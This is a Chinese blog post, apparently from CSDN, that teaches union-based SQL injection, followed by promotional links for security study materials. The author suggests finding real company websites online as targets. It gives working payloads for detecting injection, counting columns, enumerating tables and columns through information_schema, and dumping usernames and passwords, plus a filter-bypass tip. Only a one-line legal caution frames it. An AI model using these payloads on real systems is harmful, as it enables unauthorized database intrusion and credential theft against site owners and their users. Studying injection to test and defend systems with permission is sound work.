渗透测试之sql注入验证安全与攻击性能

于 2024-08-27 08:04:08 发布
阅读量826 收藏 12
点赞数 8
文章标签: sql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53058639/article/details/141582818
版权

🍅 视频学习: 文末有免费的配套视频可观看

🍅 关注公众号【互联网杂货铺】,回复 1 ,免费获取软件测试全套资料,资料在手,涨薪更快

由于渗透测试牵涉到安全性以及攻击性,为了便于交流分享,本人这里不进行具体网址的透露了。

我们可以在网上查找一些公司官方网站如(http://www.XXXXXX.com/xxxx?id=1)

1、拿到网页后进行查找注入点;

1、通过单引号 ’ ; 在 url 后面输入单引号进行回车(如果报错可能存在sql注入为:10%左右)

2、利用逻辑运算(在 url 后面 输入 and 1=1 正常;1=2不正常,sql 注入漏洞概率为:40-60%左右)

3、利用沉睡函数俗称摸鱼函数(在 url 后面输入sleep(10),网页会休眠停留10s ,休眠与网速有关所以sql 注入漏洞概率为:50%左右)

4、利用运算进行测试(eg:id=1 则可以修改为id=2-1或3-2 ,±×÷都能够进行计算并跑通,sql 注入漏洞概率为:95-100%左右)

2、进行测试报字段通过(order by函数);我的字段是9

在url后面加上order by XXX(整数) 利用XXX多次进行寻找临界值(报错与不报错边缘)

3、通过寻找到的字段后进行联合查询;

URL + union select
1,2,3,4,5,6,7,8,9(会出现字段序号对应的位置,1不要变因为通常第一位是序号,后面数字只是占位置可以改变)

4、查询数据库名;

URL + union select
1,2,database(),4,5,6,7,8,9(database(),所占位置当然也是可以改变的的,不要占用1,就行)

5、查询数据库版本号;

URL + union select 1,2,3,4,version(),6,7,8,9
(version(),所占位置当然也是可以改变的的,不要占用1,就行)

查询数据库版本的目的是因为一旦mysql版本大于5.0必然会有默认库information,如下:

![图片](https://img-
blog.csdnimg.cn/img_convert/01407a54877cc6ddb36d969176f7b9fa.png)

我们通常使用的默认库是:information_schema

6、查询数据库中的表名;

URL + union select 1,2,3,4,group_concat(table_name),6,7,8,9,from
information_schema.tables where table_schema=database() 可以查出所有表的表名

7、直接爆出表中用户;

URL + union select 1,2,3,4,group_concat(column_name),6,7,8,9,from
information_schema.columns where table_name=‘表名’

注:有时候开发很聪明会对代码进行特殊字符进行过滤,那么我们就需要进行绕过去,我们可以对’表名‘进行转换为16进制或别的都行然后再进行输入查询

8、查看表中所有信息内容;

URL + union select 1,2,3,4,group_concat(usename,0x7e,password),6,7,8,9,from 表名
则可以查出所有用户具体信息

PS: 我这里如何破解后台网址以及登录就不再详细演示了(注意密码可能需要进行尝试解密)
提倡网络安全,切勿在法律边缘游走,不要随意攻击别人网站

同时,在这我为大家准备了一份软件测试视频教程(含面试、接口、自动化、性能测试等), 就在下方,需要的可以直接去观看,也可以直接
【点击文末小卡片免费领取资料文档】

软件测试视频教程观看处:

【2024最新版】Python自动化测试15天从入门到精通,10个项目实战,允许白嫖。。。

学习计划安排


我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!

如果你对网络安全入门感兴趣,那么你需要的话可以

点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

## 最后
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2023密码学/隐身术/PWN技术手册大全

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

扫码领取

程序员小肖
关注
  • 8
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【愚公系列】2023年05月 Web渗透测试SQL注入sqli-labs、Less-23-28)
时光隧道
08-02 5万+
SQL注入是一种常见的攻击方式,它利用应用程序未对用户输入的数据进行正确的过滤和验证,以达到访问或篡改系统数据的目的。具体来说,攻击者可以在注入点上构造恶意的SQL语句,并成功提交给数据库执行,从而造成数据泄露、篡改或者破坏。SQL注入攻击的应用场景非常广泛,常见于Web应用、数据库应用或其他需要使用SQL语句进行数据操作的应用中。SQL注释符是一种用于在SQL语句中注释代码的特殊符号,例如"–“或”/* */"。SQL注入攻击者可以利用注释符号来注入恶意代码。
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3065
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
sql注入攻击之sqlmap
06-10
为了确保网站免受SQL注入攻击,开发者应遵循以下最佳实践:参数化查询或预编译语句的使用,输入验证,限制数据库用户的权限,及时更新数据库软件以修复已知漏洞,以及定期进行安全审计和渗透测试。 总的来说,SQL...
基于渗透测试SQL注入的防范.pdf
09-19
SQL注入是一种常见的网络...综上所述,预防SQL注入需要多方面的努力,包括正确的输入验证安全编程习惯、使用安全框架以及持续的渗透测试和监控。只有这样,才能确保Web应用免受SQL注入的威胁,保护宝贵的数据库资源。
SQL】关注者数量
Frost_Descent的博客
08-23 549
(user_id, follower_id) 是这个表的主键(具有唯一值的列的组合)。count计数,count(follower_id) followers_count。该表包含一个关注关系中关注者和用户的编号,其中关注者关注用户。使用order by升序排列order by user_id。编写解决方案,对于每一个用户,返回该用户的关注者数量。按照用户id分组,group by user_id。查询结果的格式如下示例所示。2 的关注者有 {0,1}0 的关注者有 {1}1 的关注者有 {0}
数据库查询大量数据避免内存溢出的方法
huan1213858的博客
08-23 239
每次查询一定数量数据之后记录id,进行数据处理之后再继续查询继续处理,
SQL进阶技巧:如何按任意时段分析时间区间问题? | 分区间讨论【左、中、右】
石榴姐yyds
08-23 118
本文分析了一种按任意时段计算时间区间问题的方法和思路,其本质是区间重叠问题的应用,文中给出了两种方法,一种按照区间重叠的方式进行分情况讨论划分区间,找出重叠区间,并计算问题,一种按照区间展开的形式形成全量的明细表,基于明细表求解任意给定的时段统计问题
推荐一篇 学习SQL 的文章
最新发布
m0_66975650的博客
08-26 360
学习 java,当然避不开数据库的知识,个人认为好学好理解的一篇文章,推荐给大家
PostgreSQL 内核资源管理
分享关于Java编程、数据库管理和信息安全方面的最佳实践
08-23 1250
PostgreSQL 有时会耗尽各种操作系统资源限制,特别是在同一系统上运行多个服务器实例或在非常大的安装环境中。此部分解释了 PostgreSQL 使用的内核资源,以及解决与内核资源消耗相关问题的步骤。
【PGCCC】PostgreSQL 死锁揭秘:如何检测与解决死锁问题的详细指南
PGCCC的博客
08-23 990
PostgreSQL 的死锁检测机制通过锁等待图的构建和环路检测,能够有效地识别和处理死锁问题。了解其工作原理和处理策略对于优化数据库性能和提高系统稳定性至关重要。在实际应用中,及时分析和处理死锁情况,并优化数据库操作,可以减少死锁的发生,从而提升数据库的整体效率。
SQL 对版本进行排序遇到的问题
qq_40603125的博客
08-26 125
物料存在多喝版本,我们每次只需要使用最新的版本。
[mysql][sql]mysql查询表大小
一名不太专业的程序员
08-21 540
表中选择特定数据库(在这个例子中是名为 'crawleroocllisten' 的数据库)的表信息。查询结果包括数据库名、表名、表中的记录数以及数据和索引所占用的空间容量(单位为MB)。这个查询通常用于数据库管理,帮助管理员了解数据库中各个表的大小和记录数,以便进行优化和维护。函数来将数据和索引长度除以1024两次(将字节转换为MB),并且保留两位小数。SQL 查询语句,用于从。
数据库表的nb3和sql后缀的处理方式
Tresson_A的博客
08-26 251
你想把这个表加到哪个库下就选择 右键备份 -- 还原备份从 -- 选择后缀是nb3的文件。右键你选择存放的数据库 -- 运行sql文件 -- 选择后缀是sql的文件。后缀是sql的话就直接运行sql文件 就可以把数据库添加到本地了(像这样)如果同事给你了一个后缀是nb3的话 那么就需要你去还原了。这样就可以把那个nb3的表还原啦。
MSSQL 工具注入(第一关)
baishiqi12的博客
08-25 646
MSSQL 注入,仅供参考
postgresql版本升级
kmblack1的专栏
08-23 335
从postgresql 12升级至postgresql 14。
看图学sqlsql中的子查询
atbigapp的博客
08-23 350
看图学sqlsql中的子查询
Mysql里面全部都是事务?SQLite和PostgreSQL也是一样吗?
liuruiaaa的博客
08-23 645
Mysql里面全部都是事务?SQLite和PostgreSQL也是一样吗?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值